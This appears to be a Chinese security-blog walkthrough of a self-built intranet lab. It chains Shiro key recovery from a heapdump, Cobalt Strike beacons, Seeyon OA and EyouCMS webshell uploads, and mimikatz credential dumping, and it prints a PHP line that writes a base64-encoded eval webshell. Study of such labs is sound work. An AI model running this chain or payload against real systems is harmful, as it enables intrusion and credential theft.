由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！

自建内网靶场

https://github.com/yangzongzhuan/RuoYi/releases

ruoyi-admintargetclassesapplication-druid.yml

修改数据库账号密码

idea编译生成适配环境的jar包

数据库配置推荐：mysql5+、jdk1.8

新建数据库ry，导入sql目录的两个sql文件

成功运行

检索cipherKey替换key

除此以外，为了搭建存在的漏洞环境，还需要在pom.xml修改shiro的版本为有漏洞的版本

生成heapdump

1

C:Program FilesJavajdk1.8.0_301bin>jmap -dump:file=C:UsersPublicheapdump <pid>

这样heapdump中便带有了shiro的key

入口机器

80端口为若依系统,8081端口为tomcat管理界面

若依使用的是4.6的版本，存在前台shiro漏洞利用，但是key被修改了

对8081端口tomcat页面进行目录扫描，发现存在heapdump

使用工具进行利用，发现泄露的shiro key

利用的时候记得勾选AES GCM不然会利用不成功

内存马连接后上线cs

对内网资产进行扫描

第二台机器

访问192.168.1.3:81发现是致远oa

使用历史漏洞ajax.do成功写入webshell

使用天蝎进行连接

使用cs建立smb隧道，生成正向beacon到致远机器上运行

或者通过tcp回连

mimikatz抓取密码，发现存在zzz账户

登录zzz账户，在桌面上发现第二个flag

第三台机器

并且通过浏览器记录发现其曾访问过http://192.168.2.3/，并保存了密码，指纹识别为eyoucms

eyoucms1.5.5存在后台getshell漏洞，尝试进行利用

写入webshell，连接成功后拿到第三个flag

1

<?=file_put_contents("./sx1.php",base64_decode("PD9waHAKZXZhbCgkX1BPU1RbInBhc3MiXSk7"));

欢 迎 加 入 星 球 ！

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么？赶紧点击下方名片关注学习吧！

推荐阅读

干货｜史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明

由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号渗透安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！